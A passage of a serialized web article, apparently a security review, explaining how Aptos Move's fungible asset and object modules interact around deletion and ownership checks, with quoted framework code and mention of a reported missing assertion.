a standalone module. It has heavy dependencies on a sibling module, the ",{"type":26,"tag":130,"props":65435,"children":65437},{"className":65436},[],[65438],{"type":32,"value":51453},{"type":32,"value":65440}," module, introduced in ",{"type":26,"tag":41,"props":65442,"children":65445},{"href":65443,"rel":65444},"https://github.com/aptos-foundation/AIPs/blob/main/aips/aip-10.md",[45],[65446],{"type":32,"value":65447},"AIP-10",{"type":32,"value":470},{"type":26,"tag":5503,"props":65450,"children":65451},{},[65452],{"type":26,"tag":35,"props":65453,"children":65454},{},[65455,65459],{"type":26,"tag":137,"props":65456,"children":65457},{},[65458],{"type":32,"value":64051},{"type":32,"value":65460}," proposes a standard for Fungible Assets (FA) using Move Objects. In this model, any on-chain asset represented as an object can also be expressed as a fungible asset allowing for a single object to be represented by many distinct, yet interchangeable units of ownership.",{"type":26,"tag":35,"props":65462,"children":65463},{},[65464],{"type":32,"value":65465},"These two modules are closely intertwined, and their connection can be surprisingly intricate.",{"type":26,"tag":118,"props":65467,"children":65469},{"id":65468},"creation-and-deletion",[65470],{"type":32,"value":65471},"Creation and deletion",{"type":26,"tag":35,"props":65473,"children":65474},{},[65475,65477,65483],{"type":32,"value":65476},"To create a fungible resource, an undeletable object must first be created. \"Undeletable\" means, that it's not possible to get a permission to delete it. This is verified in ",{"type":26,"tag":130,"props":65478,"children":65480},{"className":65479},[],[65481],{"type":32,"value":65482},"fungible_asset::add_fungibility",{"type":32,"value":7072},{"type":26,"tag":5512,"props":65485,"children":65487},{"className":5552,"code":65486,"language":5551,"meta":7,"style":7},"assert!(!object::can_generate_delete_ref(constructor_ref), error::invalid_argument(EOBJECT_IS_DELETABLE));\n",[65488],{"type":26,"tag":130,"props":65489,"children":65490},{"__ignoreMap":7},[65491],{"type":26,"tag":137,"props":65492,"children":65493},{"class":5559,"line":5560},[65494,65498,65502,65506,65511,65515,65520,65524,65529,65534,65538,65542],{"type":26,"tag":137,"props":65495,"children":65496},{"style":5682},[65497],{"type":32,"value":44582},{"type":26,"tag":137,"props":65499,"children":65500},{"style":5601},[65501],{"type":32,"value":165},{"type":26,"tag":137,"props":65503,"children":65504},{"style":5590},[65505],{"type":32,"value":23215},{"type":26,"tag":137,"props":65507,"children":65508},{"style":5601},[65509],{"type":32,"value":65510},"object",{"type":26,"tag":137,"props":65512,"children":65513},{"style":5590},[65514],{"type":32,"value":6072},{"type":26,"tag":137,"props":65516,"children":65517},{"style":5682},[65518],{"type":32,"value":65519},"can_generate_delete_ref",{"type":26,"tag":137,"props":65521,"children":65522},{"style":5601},[65523],{"type":32,"value":165},{"type":26,"tag":137,"props":65525,"children":65526},{"style":5584},[65527],{"type":32,"value":65528},"constructor_ref",{"type":26,"tag":137,"props":65530,"children":65531},{"style":5601},[65532],{"type":32,"value":65533},"), error",{"type":26,"tag":137,"props":65535,"children":65536},{"style":5590},[65537],{"type":32,"value":6072},{"type":26,"tag":137,"props":65539,"children":65540},{"style":5682},[65541],{"type":32,"value":64974},{"type":26,"tag":137,"props":65543,"children":65544},{"style":5601},[65545],{"type":32,"value":65546},"(EOBJECT_IS_DELETABLE));\n",{"type":26,"tag":35,"props":65548,"children":65549},{},[65550,65552,65557,65559,65564,65565,65572],{"type":32,"value":65551},"This object serves as the foundation for ownership tokens in the form of a ",{"type":26,"tag":130,"props":65553,"children":65555},{"className":65554},[],[65556],{"type":32,"value":64112},{"type":32,"value":65558},". This means that allowing it to be deletable wouldn't make sense and would impact the usability of such fungible assets, restricting users from accessing critical functionalities such as creating new stores. In the past the ",{"type":26,"tag":130,"props":65560,"children":65562},{"className":65561},[],[65563],{"type":32,"value":65482},{"type":32,"value":1011},{"type":26,"tag":41,"props":65566,"children":65569},{"href":65567,"rel":65568},"https://github.com/aptos-labs/aptos-core/commit/6976f8e9004b0f6ebb6fd976410d695c5a5a7ace",[45],[65570],{"type":32,"value":65571},"lacked this assert",{"type":32,"value":65573},", which we discovered and reported.",{"type":26,"tag":35,"props":65575,"children":65576},{},[65577,65582,65584,65589,65591,65596],{"type":26,"tag":130,"props":65578,"children":65580},{"className":65579},[],[65581],{"type":32,"value":65482},{"type":32,"value":65583}," transfers the ",{"type":26,"tag":130,"props":65585,"children":65587},{"className":65586},[],[65588],{"type":32,"value":64171},{"type":32,"value":65590}," and associated resources to this new object. After that, with the appropriate permissions, the ",{"type":26,"tag":130,"props":65592,"children":65594},{"className":65593},[],[65595],{"type":32,"value":64112},{"type":32,"value":65597}," can be minted, representing a share of ownership in that object.",{"type":26,"tag":5512,"props":65599,"children":65601},{"className":5552,"code":65600,"language":5551,"meta":7,"style":7},"/// Make an existing object fungible by adding the Metadata resource.\npublic fun add_fungibility(\n    [...]\n): Object\u003CMetadata> {\n    [...]\n    move_to(metadata_object_signer,\n        Metadata {\n            name,\n            symbol,\n            decimals,\n            icon_uri,\n            project_uri,\n        }\n    );\n[...]\n}\n",[65602],{"type":26,"tag":130,"props":65603,"children":65604},{"__ignoreMap":7},[65605,65613,65633,65648,65675,65690,65711,65723,65735,65747,65759,65771,65783,65790,65797,65812],{"type":26,"tag":137,"props":65606,"children":65607},{"class":5559,"line":5560},[65608],{"type":26,"tag":137,"props":65609,"children":65610},{"style":5564},[65611],{"type":32,"value":65612},"/// Make an existing object fungible by adding the Metadata resource.\n",{"type":26,"tag":137,"props":65614,"children":65615},{"class":5559,"line":5412},[65616,65620,65624,65629],{"type":26,"tag":137,"props":65617,"children":65618},{"style":5584},[65619],{"type":32,"value":64276},{"type":26,"tag":137,"props":65621,"children":65622},{"style":5584},[65623],{"type":32,"value":8792},{"type":26,"tag":137,"props":65625,"children":65626},{"style":5682},[65627],{"type":32,"value":65628}," add_fungibility",{"type":26,"tag":137,"props":65630,"children":65631},{"style":5601},[65632],{"type":32,"value":6054},{"type":26,"tag":137,"props":65634,"children":65635},{"class":5559,"line":5417},[65636,65640,65644],{"type":26,"tag":137,"props":65637,"children":65638},{"style":5601},[65639],{"type":32,"value":65318},{"type":26,"tag":137,"props":65641,"children":65642},{"style":5590},[65643],{"type":32,"value":12180},{"type":26,"tag":137,"props":65645,"children":65646},{"style":5601},[65647],{"type":32,"value":14363},{"type":26,"tag":137,"props":65649,"children":65650},{"class":5559,"line":5642},[65651,65655,65659,65663,65667,65671],{"type":26,"tag":137,"props":65652,"children":65653},{"style":5601},[65654],{"type":32,"value":200},{"type":26,"tag":137,"props":65656,"children":65657},{"style":5590},[65658],{"type":32,"value":7072},{"type":26,"tag":137,"props":65660,"children":65661},{"style":6009},[65662],{"type":32,"value":64162},{"type":26,"tag":137,"props":65664,"children":65665},{"style":5601},[65666],{"type":32,"value":8391},{"type":26,"tag":137,"props":65668,"children":65669},{"style":6009},[65670],{"type":32,"value":64171},{"type":26,"tag":137,"props":65672,"children":65673},{"style":5601},[65674],{"type":32,"value":9865},{"type":26,"tag":137,"props":65676,"children":65677},{"class":5559,"line":5745},[65678,65682,65686],{"type":26,"tag":137,"props":65679,"children":65680},{"style":5601},[65681],{"type":32,"value":65318},{"type":26,"tag":137,"props":65683,"children":65684},{"style":5590},[65685],{"type":32,"value":12180},{"type":26,"tag":137,"props":65687,"children":65688},{"style":5601},[65689],{"type":32,"value":14363},{"type":26,"tag":137,"props":65691,"children":65692},{"class":5559,"line":5850},[65693,65698,65702,65707],{"type":26,"tag":137,"props":65694,"children":65695},{"style":5682},[65696],{"type":32,"value":65697},"    move_to",{"type":26,"tag":137,"props":65699,"children":65700},{"style":5601},[65701],{"type":32,"value":165},{"type":26,"tag":137,"props":65703,"children":65704},{"style":5584},[65705],{"type":32,"value":65706},"metadata_object_signer",{"type":26,"tag":137,"props":65708,"children":65709},{"style":5601},[65710],{"type":32,"value":6099},{"type":26,"tag":137,"props":65712,"children":65713},{"class":5559,"line":5878},[65714,65719],{"type":26,"tag":137,"props":65715,"children":65716},{"style":6009},[65717],{"type":32,"value":65718},"        Metadata",{"type":26,"tag":137,"props":65720,"children":65721},{"style":5601},[65722],{"type":32,"value":5875},{"type":26,"tag":137,"props":65724,"children":65725},{"class":5559,"line":5891},[65726,65731],{"type":26,"tag":137,"props":65727,"children":65728},{"style":5584},[65729],{"type":32,"value":65730},"            name",{"type":26,"tag":137,"props":65732,"children":65733},{"style":5601},[65734],{"type":32,"value":6099},{"type":26,"tag":137,"props":65736,"children":65737},{"class":5559,"line":5909},[65738,65743],{"type":26,"tag":137,"props":65739,"children":65740},{"style":5584},[65741],{"type":32,"value":65742},"            symbol",{"type":26,"tag":137,"props":65744,"children":65745},{"style":5601},[65746],{"type":32,"value":6099},{"type":26,"tag":137,"props":65748,"children":65749},{"class":5559,"line":5930},[65750,65755],{"type":26,"tag":137,"props":65751,"children":65752},{"style":5584},[65753],{"type":32,"value":65754},"            decimals",{"type":26,"tag":137,"props":65756,"children":65757},{"style":5601},[65758],{"type":32,"value":6099},{"type":26,"tag":137,"props":65760,"children":65761},{"class":5559,"line":5939},[65762,65767],{"type":26,"tag":137,"props":65763,"children":65764},{"style":5584},[65765],{"type":32,"value":65766},"            icon_uri",{"type":26,"tag":137,"props":65768,"children":65769},{"style":5601},[65770],{"type":32,"value":6099},{"type":26,"tag":137,"props":65772,"children":65773},{"class":5559,"line":6191},[65774,65779],{"type":26,"tag":137,"props":65775,"children":65776},{"style":5584},[65777],{"type":32,"value":65778},"            project_uri",{"type":26,"tag":137,"props":65780,"children":65781},{"style":5601},[65782],{"type":32,"value":6099},{"type":26,"tag":137,"props":65784,"children":65785},{"class":5559,"line":6208},[65786],{"type":26,"tag":137,"props":65787,"children":65788},{"style":5601},[65789],{"type":32,"value":5936},{"type":26,"tag":137,"props":65791,"children":65792},{"class":5559,"line":6225},[65793],{"type":26,"tag":137,"props":65794,"children":65795},{"style":5601},[65796],{"type":32,"value":46256},{"type":26,"tag":137,"props":65798,"children":65799},{"class":5559,"line":6238},[65800,65804,65808],{"type":26,"tag":137,"props":65801,"children":65802},{"style":5601},[65803],{"type":32,"value":3016},{"type":26,"tag":137,"props":65805,"children":65806},{"style":5590},[65807],{"type":32,"value":12180},{"type":26,"tag":137,"props":65809,"children":65810},{"style":5601},[65811],{"type":32,"value":14363},{"type":26,"tag":137,"props":65813,"children":65814},{"class":5559,"line":6247},[65815],{"type":26,"tag":137,"props":65816,"children":65817},{"style":5601},[65818],{"type":32,"value":6507},{"type":26,"tag":3265,"props":65820,"children":65821},{},[],{"type":26,"tag":35,"props":65823,"children":65824},{},[65825,65827,65832,65834,65839],{"type":32,"value":65826},"Deletions can be a big issue even when dealing with objects that are eligible for deletion. For example, a ",{"type":26,"tag":130,"props":65828,"children":65830},{"className":65829},[],[65831],{"type":32,"value":64676},{"type":32,"value":65833}," is also an object, and a \"secondary\" ",{"type":26,"tag":130,"props":65835,"children":65837},{"className":65836},[],[65838],{"type":32,"value":64676},{"type":32,"value":65840}," can be created as deletable if empty. The catch is that deletion can occur both at the fungible asset level and at the object level.",{"type":26,"tag":5512,"props":65842,"children":65844},{"className":5552,"code":65843,"language":5551,"meta":7,"style":7},"//Fungible asset\npublic fun remove_store(delete_ref: &DeleteRef)\n\n//Object\npublic fun delete(ref: DeleteRef)\n",[65845],{"type":26,"tag":130,"props":65846,"children":65847},{"__ignoreMap":7},[65848,65856,65898,65905,65913],{"type":26,"tag":137,"props":65849,"children":65850},{"class":5559,"line":5560},[65851],{"type":26,"tag":137,"props":65852,"children":65853},{"style":5564},[65854],{"type":32,"value":65855},"//Fungible asset\n",{"type":26,"tag":137,"props":65857,"children":65858},{"class":5559,"line":5412},[65859,65863,65867,65872,65876,65881,65885,65889,65894],{"type":26,"tag":137,"props":65860,"children":65861},{"style":5584},[65862],{"type":32,"value":64276},{"type":26,"tag":137,"props":65864,"children":65865},{"style":5584},[65866],{"type":32,"value":8792},{"type":26,"tag":137,"props":65868,"children":65869},{"style":5682},[65870],{"type":32,"value":65871}," remove_store",{"type":26,"tag":137,"props":65873,"children":65874},{"style":5601},[65875],{"type":32,"value":165},{"type":26,"tag":137,"props":65877,"children":65878},{"style":5584},[65879],{"type":32,"value":65880},"delete_ref",{"type":26,"tag":137,"props":65882,"children":65883},{"style":5590},[65884],{"type":32,"value":7072},{"type":26,"tag":137,"props":65886,"children":65887},{"style":5590},[65888],{"type":32,"value":9725},{"type":26,"tag":137,"props":65890,"children":65891},{"style":6009},[65892],{"type":32,"value":65893},"DeleteRef",{"type":26,"tag":137,"props":65895,"children":65896},{"style":5601},[65897],{"type":32,"value":5742},{"type":26,"tag":137,"props":65899,"children":65900},{"class":5559,"line":5417},[65901],{"type":26,"tag":137,"props":65902,"children":65903},{"emptyLinePlaceholder":18},[65904],{"type":32,"value":6276},{"type":26,"tag":137,"props":65906,"children":65907},{"class":5559,"line":5642},[65908],{"type":26,"tag":137,"props":65909,"children":65910},{"style":5564},[65911],{"type":32,"value":65912},"//Object\n",{"type":26,"tag":137,"props":65914,"children":65915},{"class":5559,"line":5745},[65916,65920,65924,65929,65933,65938,65942,65947],{"type":26,"tag":137,"props":65917,"children":65918},{"style":5584},[65919],{"type":32,"value":64276},{"type":26,"tag":137,"props":65921,"children":65922},{"style":5584},[65923],{"type":32,"value":8792},{"type":26,"tag":137,"props":65925,"children":65926},{"style":5682},[65927],{"type":32,"value":65928}," delete",{"type":26,"tag":137,"props":65930,"children":65931},{"style":5601},[65932],{"type":32,"value":165},{"type":26,"tag":137,"props":65934,"children":65935},{"style":5573},[65936],{"type":32,"value":65937},"ref",{"type":26,"tag":137,"props":65939,"children":65940},{"style":5590},[65941],{"type":32,"value":7072},{"type":26,"tag":137,"props":65943,"children":65944},{"style":6009},[65945],{"type":32,"value":65946}," DeleteRef",{"type":26,"tag":137,"props":65948,"children":65949},{"style":5601},[65950],{"type":32,"value":5742},{"type":26,"tag":35,"props":65952,"children":65953},{},[65954,65956,65962,65964,65969,65971,65976,65978,65983,65985,65991,65993,65999,66001,66006],{"type":32,"value":65955},"When ",{"type":26,"tag":130,"props":65957,"children":65959},{"className":65958},[],[65960],{"type":32,"value":65961},"object::delete",{"type":32,"value":65963}," removes the ",{"type":26,"tag":130,"props":65965,"children":65967},{"className":65966},[],[65968],{"type":32,"value":51453},{"type":32,"value":65970}," from a ",{"type":26,"tag":130,"props":65972,"children":65974},{"className":65973},[],[65975],{"type":32,"value":64676},{"type":32,"value":65977}," object, the ",{"type":26,"tag":130,"props":65979,"children":65981},{"className":65980},[],[65982],{"type":32,"value":64676},{"type":32,"value":65984}," resource becomes permanently undeletable. This is because ",{"type":26,"tag":130,"props":65986,"children":65988},{"className":65987},[],[65989],{"type":32,"value":65990},"remove_store",{"type":32,"value":65992}," can't create an ",{"type":26,"tag":130,"props":65994,"children":65996},{"className":65995},[],[65997],{"type":32,"value":65998},"Object\u003CFungibleStore>",{"type":32,"value":66000}," without an ",{"type":26,"tag":130,"props":66002,"children":66004},{"className":66003},[],[66005],{"type":32,"value":51453},{"type":32,"value":66007}," underneath, causing the operation to fail.",{"type":26,"tag":5512,"props":66009,"children":66011},{"className":5552,"code":66010,"language":5551,"meta":7,"style":7},"public fun remove_store(delete_ref: &DeleteRef) acquires [...] {\n    let store = &object::object_from_delete_ref\u003CFungibleStore>(delete_ref);\n    [...]\n}\n",[66012],{"type":26,"tag":130,"props":66013,"children":66014},{"__ignoreMap":7},[66015,66070,66122,66137],{"type":26,"tag":137,"props":66016,"children":66017},{"class":5559,"line":5560},[66018,66022,66026,66030,66034,66038,66042,66046,66050,66054,66058,66062,66066],{"type":26,"tag":137,"props":66019,"children":66020},{"style":5584},[66021],{"type":32,"value":64276},{"type":26,"tag":137,"props":66023,"children":66024},{"style":5584},[66025],{"type":32,"value":8792},{"type":26,"tag":137,"props":66027,"children":66028},{"style":5682},[66029],{"type":32,"value":65871},{"type":26,"tag":137,"props":66031,"children":66032},{"style":5601},[66033],{"type":32,"value":165},{"type":26,"tag":137,"props":66035,"children":66036},{"style":5584},[66037],{"type":32,"value":65880},{"type":26,"tag":137,"props":66039,"children":66040},{"style":5590},[66041],{"type":32,"value":7072},{"type":26,"tag":137,"props":66043,"children":66044},{"style":5590},[66045],{"type":32,"value":9725},{"type":26,"tag":137,"props":66047,"children":66048},{"style":6009},[66049],{"type":32,"value":65893},{"type":26,"tag":137,"props":66051,"children":66052},{"style":5601},[66053],{"type":32,"value":5671},{"type":26,"tag":137,"props":66055,"children":66056},{"style":5584},[66057],{"type":32,"value":8929},{"type":26,"tag":137,"props":66059,"children":66060},{"style":5601},[66061],{"type":32,"value":25612},{"type":26,"tag":137,"props":66063,"children":66064},{"style":5590},[66065],{"type":32,"value":12180},{"type":26,"tag":137,"props":66067,"children":66068},{"style":5601},[66069],{"type":32,"value":64367},{"type":26,"tag":137,"props":66071,"children":66072},{"class":5559,"line":5412},[66073,66077,66081,66085,66089,66093,66097,66102,66106,66110,66114,66118],{"type":26,"tag":137,"props":66074,"children":66075},{"style":5573},[66076],{"type":32,"value":5576},{"type":26,"tag":137,"props":66078,"children":66079},{"style":5584},[66080],{"type":32,"value":8416},{"type":26,"tag":137,"props":66082,"children":66083},{"style":5590},[66084],{"type":32,"value":5593},{"type":26,"tag":137,"props":66086,"children":66087},{"style":5590},[66088],{"type":32,"value":9725},{"type":26,"tag":137,"props":66090,"children":66091},{"style":5601},[66092],{"type":32,"value":65510},{"type":26,"tag":137,"props":66094,"children":66095},{"style":5590},[66096],{"type":32,"value":6072},{"type":26,"tag":137,"props":66098,"children":66099},{"style":5584},[66100],{"type":32,"value":66101},"object_from_delete_ref",{"type":26,"tag":137,"props":66103,"children":66104},{"style":5601},[66105],{"type":32,"value":8391},{"type":26,"tag":137,"props":66107,"children":66108},{"style":6009},[66109],{"type":32,"value":64676},{"type":26,"tag":137,"props":66111,"children":66112},{"style":5601},[66113],{"type":32,"value":10195},{"type":26,"tag":137,"props":66115,"children":66116},{"style":5584},[66117],{"type":32,"value":65880},{"type":26,"tag":137,"props":66119,"children":66120},{"style":5601},[66121],{"type":32,"value":6430},{"type":26,"tag":137,"props":66123,"children":66124},{"class":5559,"line":5417},[66125,66129,66133],{"type":26,"tag":137,"props":66126,"children":66127},{"style":5601},[66128],{"type":32,"value":65318},{"type":26,"tag":137,"props":66130,"children":66131},{"style":5590},[66132],{"type":32,"value":12180},{"type":26,"tag":137,"props":66134,"children":66135},{"style":5601},[66136],{"type":32,"value":14363},{"type":26,"tag":137,"props":66138,"children":66139},{"class":5559,"line":5642},[66140],{"type":26,"tag":137,"props":66141,"children":66142},{"style":5601},[66143],{"type":32,"value":6507},{"type":26,"tag":35,"props":66145,"children":66146},{},[66147,66149,66154,66156,66162,66164,66169],{"type":32,"value":66148},"In addition, such \"deleted\" ",{"type":26,"tag":130,"props":66150,"children":66152},{"className":66151},[],[66153],{"type":32,"value":64676},{"type":32,"value":66155}," objects remain at least partially operable. For instance, ",{"type":26,"tag":130,"props":66157,"children":66159},{"className":66158},[],[66160],{"type":32,"value":66161},"fungible_asset::deposit",{"type":32,"value":66163}," does not check the ",{"type":26,"tag":130,"props":66165,"children":66167},{"className":66166},[],[66168],{"type":32,"value":51453},{"type":32,"value":66170}," existence.",{"type":26,"tag":118,"props":66172,"children":66174},{"id":66173},"ownership",[66175],{"type":32,"value":66176},"Ownership",{"type":26,"tag":35,"props":66178,"children":66179},{},[66180,66182,66187,66189,66195,66197,66202],{"type":32,"value":66181},"Each object has an owner. Fungible assets rely on the ",{"type":26,"tag":130,"props":66183,"children":66185},{"className":66184},[],[66186],{"type":32,"value":51453},{"type":32,"value":66188}," ownership model. For example, during a withdrawal operation, the signer is validated using ",{"type":26,"tag":130,"props":66190,"children":66192},{"className":66191},[],[66193],{"type":32,"value":66194},"object::owns",{"type":32,"value":66196}," to confirm ownership of the ",{"type":26,"tag":130,"props":66198,"children":66200},{"className":66199},[],[66201],{"type":32,"value":64676},{"type":32,"value":52779},{"type":26,"tag":5512,"props":66204,"children":66206},{"className":5552,"code":66205,"language":5551,"meta":7,"style":7},"public(friend) fun withdraw_sanity_check\u003CT: key>(\n    owner: &signer,\n    store: Object\u003CT>,\n    abort_on_dispatch: bool,\n) acquires FungibleStore, DispatchFunctionStore {\n    assert!(object::owns(store, signer::address_of(owner)), error::permission_denied(ENOT_STORE_OWNER));\n    [...]\n}\n",[66207],{"type":26,"tag":130,"props":66208,"children":66209},{"__ignoreMap":7},[66210,66258,66282,66309,66329,66357,66425,66440],{"type":26,"tag":137,"props":66211,"children":66212},{"class":5559,"line":5560},[66213,66217,66221,66225,66229,66233,66238,66242,66246,66250,66254],{"type":26,"tag":137,"props":66214,"children":66215},{"style":5682},[66216],{"type":32,"value":64276},{"type":26,"tag":137,"props":66218,"children":66219},{"style":5601},[66220],{"type":32,"value":165},{"type":26,"tag":137,"props":66222,"children":66223},{"style":5584},[66224],{"type":32,"value":9682},{"type":26,"tag":137,"props":66226,"children":66227},{"style":5601},[66228],{"type":32,"value":5671},{"type":26,"tag":137,"props":66230,"children":66231},{"style":5584},[66232],{"type":32,"value":9691},{"type":26,"tag":137,"props":66234,"children":66235},{"style":5584},[66236],{"type":32,"value":66237}," withdraw_sanity_check",{"type":26,"tag":137,"props":66239,"children":66240},{"style":5601},[66241],{"type":32,"value":8391},{"type":26,"tag":137,"props":66243,"children":66244},{"style":6009},[66245],{"type":32,"value":2064},{"type":26,"tag":137,"props":66247,"children":66248},{"style":5590},[66249],{"type":32,"value":7072},{"type":26,"tag":137,"props":66251,"children":66252},{"style":5584},[66253],{"type":32,"value":8517},{"type":26,"tag":137,"props":66255,"children":66256},{"style":5601},[66257],{"type":32,"value":9172},{"type":26,"tag":137,"props":66259,"children":66260},{"class":5559,"line":5412},[66261,66266,66270,66274,66278],{"type":26,"tag":137,"props":66262,"children":66263},{"style":5584},[66264],{"type":32,"value":66265},"    owner",{"type":26,"tag":137,"props":66267,"children":66268},{"style":5590},[66269],{"type":32,"value":7072},{"type":26,"tag":137,"props":66271,"children":66272},{"style":5590},[66273],{"type":32,"value":9725},{"type":26,"tag":137,"props":66275,"children":66276},{"style":5584},[66277],{"type":32,"value":9730},{"type":26,"tag":137,"props":66279,"children":66280},{"style":5601},[66281],{"type":32,"value":6099},{"type":26,"tag":137,"props":66283,"children":66284},{"class":5559,"line":5417},[66285,66289,66293,66297,66301,66305],{"type":26,"tag":137,"props":66286,"children":66287},{"style":5584},[66288],{"type":32,"value":32008},{"type":26,"tag":137,"props":66290,"children":66291},{"style":5590},[66292],{"type":32,"value":7072},{"type":26,"tag":137,"props":66294,"children":66295},{"style":6009},[66296],{"type":32,"value":64162},{"type":26,"tag":137,"props":66298,"children":66299},{"style":5601},[66300],{"type":32,"value":8391},{"type":26,"tag":137,"props":66302,"children":66303},{"style":6009},[66304],{"type":32,"value":2064},{"type":26,"tag":137,"props":66306,"children":66307},{"style":5601},[66308],{"type":32,"value":8723},{"type":26,"tag":137,"props":66310,"children":66311},{"class":5559,"line":5642},[66312,66317,66321,66325],{"type":26,"tag":137,"props":66313,"children":66314},{"style":5584},[66315],{"type":32,"value":66316},"    abort_on_dispatch",{"type":26,"tag":137,"props":66318,"children":66319},{"style":5590},[66320],{"type":32,"value":7072},{"type":26,"tag":137,"props":66322,"children":66323},{"style":6009},[66324],{"type":32,"value":14641},{"type":26,"tag":137,"props":66326,"children":66327},{"style":5601},[66328],{"type":32,"value":6099},{"type":26,"tag":137,"props":66330,"children":66331},{"class":5559,"line":5745},[66332,66336,66340,66344,66348,66353],{"type":26,"tag":137,"props":66333,"children":66334},{"style":5601},[66335],{"type":32,"value":5671},{"type":26,"tag":137,"props":66337,"children":66338},{"style":5584},[66339],{"type":32,"value":8929},{"type":26,"tag":137,"props":66341,"children":66342},{"style":6009},[66343],{"type":32,"value":64696},{"type":26,"tag":137,"props":66345,"children":66346},{"style":5601},[66347],{"type":32,"value":1108},{"type":26,"tag":137,"props":66349,"children":66350},{"style":6009},[66351],{"type":32,"value":66352},"DispatchFunctionStore",{"type":26,"tag":137,"props":66354,"children":66355},{"style":5601},[66356],{"type":32,"value":5875},{"type":26,"tag":137,"props":66358,"children":66359},{"class":5559,"line":5850},[66360,66364,66369,66373,66378,66382,66386,66390,66394,66398,66402,66406,66411,66415,66420],{"type":26,"tag":137,"props":66361,"children":66362},{"style":5682},[66363],{"type":32,"value":64944},{"type":26,"tag":137,"props":66365,"children":66366},{"style":5601},[66367],{"type":32,"value":66368},"(object",{"type":26,"tag":137,"props":66370,"children":66371},{"style":5590},[66372],{"type":32,"value":6072},{"type":26,"tag":137,"props":66374,"children":66375},{"style":5682},[66376],{"type":32,"value":66377},"owns",{"type":26,"tag":137,"props":66379,"children":66380},{"style":5601},[66381],{"type":32,"value":165},{"type":26,"tag":137,"props":66383,"children":66384},{"style":5584},[66385],{"type":32,"value":8526},{"type":26,"tag":137,"props":66387,"children":66388},{"style":5601},[66389],{"type":32,"value":15527},{"type":26,"tag":137,"props":66391,"children":66392},{"style":5590},[66393],{"type":32,"value":6072},{"type":26,"tag":137,"props":66395,"children":66396},{"style":5682},[66397],{"type":32,"value":9793},{"type":26,"tag":137,"props":66399,"children":66400},{"style":5601},[66401],{"type":32,"value":165},{"type":26,"tag":137,"props":66403,"children":66404},{"style":5584},[66405],{"type":32,"value":18201},{"type":26,"tag":137,"props":66407,"children":66408},{"style":5601},[66409],{"type":32,"value":66410},")), error",{"type":26,"tag":137,"props":66412,"children":66413},{"style":5590},[66414],{"type":32,"value":6072},{"type":26,"tag":137,"props":66416,"children":66417},{"style":5682},[66418],{"type":32,"value":66419},"permission_denied",{"type":26,"tag":137,"props":66421,"children":66422},{"style":5601},[66423],{"type":32,"value":66424},"(ENOT_STORE_OWNER));\n",{"type":26,"tag":137,"props":66426,"children":66427},{"class":5559,"line":5878},[66428,66432,66436],{"type":26,"tag":137,"props":66429,"children":66430},{"style":5601},[66431],{"type":32,"value":65318},{"type":26,"tag":137,"props":66433,"children":66434},{"style":5590},[66435],{"type":32,"value":12180},{"type":26,"tag":137,"props":66437,"children":66438},{"style":5601},[66439],{"type":32,"value":14363},{"type":26,"tag":137,"props":66441,"children":66442},{"class":5559,"line":5891},[66443],{"type":26,"tag":137,"props":66444,"children":66445},{"style":5601},[66446],{"type":32,"value":6507},{"type":26,"tag":35,"props":66448,"children":66449},{},[66450,66452,66457,66459,66465,66467,66473],{"type":32,"value":66451},"The thing to note is that defining ownership with ",{"type":26,"tag":130,"props":66453,"children":66455},{"className":66454},[],[66456],{"type":32,"value":66194},{"type":32,"value":66458}," can be tricky. The ",{"type":26,"tag":130,"props":66460,"children":66462},{"className":66461},[],[66463],{"type":32,"value":66464},"burn",{"type":32,"value":66466}," function was one of the reasons behind that. It allowed changing the object's owner to the ",{"type":26,"tag":130,"props":66468,"children":66470},{"className":66469},[],[66471],{"type":32,"value":66472},"BURN_ADDRESS",{"type":32,"value":66474}," while bypassing transfer restrictions:",{"type":26,"tag":5512,"props":66476,"children":66478},{"className":5552,"code":66477,"language":5551,"meta":7,"style":7},"public entry fun burn\u003CT: key>(owner: &signer, object: Object\u003CT>) acquires ObjectCore {\n    let original_owner = signer::address_of(owner);\n    assert!(is_owner(object, original_owner), error::permission_denied(ENOT_OBJECT_OWNER));\n    let object_addr = object.inner;\n    move_to(&create_signer(object_addr), TombStone { original_owner });\n    transfer_raw_inner(object_addr, BURN_ADDRESS);\n}\n",[66479],{"type":26,"tag":130,"props":66480,"children":66481},{"__ignoreMap":7},[66482,66579,66620,66670,66699,66749,66770],{"type":26,"tag":137,"props":66483,"children":66484},{"class":5559,"line":5560},[66485,66489,66493,66497,66502,66506,66510,66514,66518,66522,66526,66530,66534,66538,66542,66546,66550,66554,66558,66562,66566,66570,66575],{"type":26,"tag":137,"props":66486,"children":66487},{"style":5584},[66488],{"type":32,"value":64276},{"type":26,"tag":137,"props":66490,"children":66491},{"style":5584},[66492],{"type":32,"value":65242},{"type":26,"tag":137,"props":66494,"children":66495},{"style":5584},[66496],{"type":32,"value":8792},{"type":26,"tag":137,"props":66498,"children":66499},{"style":5584},[66500],{"type":32,"value":66501}," burn",{"type":26,"tag":137,"props":66503,"children":66504},{"style":5601},[66505],{"type":32,"value":8391},{"type":26,"tag":137,"props":66507,"children":66508},{"style":6009},[66509],{"type":32,"value":2064},{"type":26,"tag":137,"props":66511,"children":66512},{"style":5590},[66513],{"type":32,"value":7072},{"type":26,"tag":137,"props":66515,"children":66516},{"style":5584},[66517],{"type":32,"value":8517},{"type":26,"tag":137,"props":66519,"children":66520},{"style":5601},[66521],{"type":32,"value":10195},{"type":26,"tag":137,"props":66523,"children":66524},{"style":5584},[66525],{"type":32,"value":18201},{"type":26,"tag":137,"props":66527,"children":66528},{"style":5590},[66529],{"type":32,"value":7072},{"type":26,"tag":137,"props":66531,"children":66532},{"style":5590},[66533],{"type":32,"value":9725},{"type":26,"tag":137,"props":66535,"children":66536},{"style":5584},[66537],{"type":32,"value":9730},{"type":26,"tag":137,"props":66539,"children":66540},{"style":5601},[66541],{"type":32,"value":1108},{"type":26,"tag":137,"props":66543,"children":66544},{"style":5584},[66545],{"type":32,"value":65510},{"type":26,"tag":137,"props":66547,"children":66548},{"style":5590},[66549],{"type":32,"value":7072},{"type":26,"tag":137,"props":66551,"children":66552},{"style":6009},[66553],{"type":32,"value":64162},{"type":26,"tag":137,"props":66555,"children":66556},{"style":5601},[66557],{"type":32,"value":8391},{"type":26,"tag":137,"props":66559,"children":66560},{"style":6009},[66561],{"type":32,"value":2064},{"type":26,"tag":137,"props":66563,"children":66564},{"style":5601},[66565],{"type":32,"value":23040},{"type":26,"tag":137,"props":66567,"children":66568},{"style":5584},[66569],{"type":32,"value":8929},{"type":26,"tag":137,"props":66571,"children":66572},{"style":6009},[66573],{"type":32,"value":66574}," 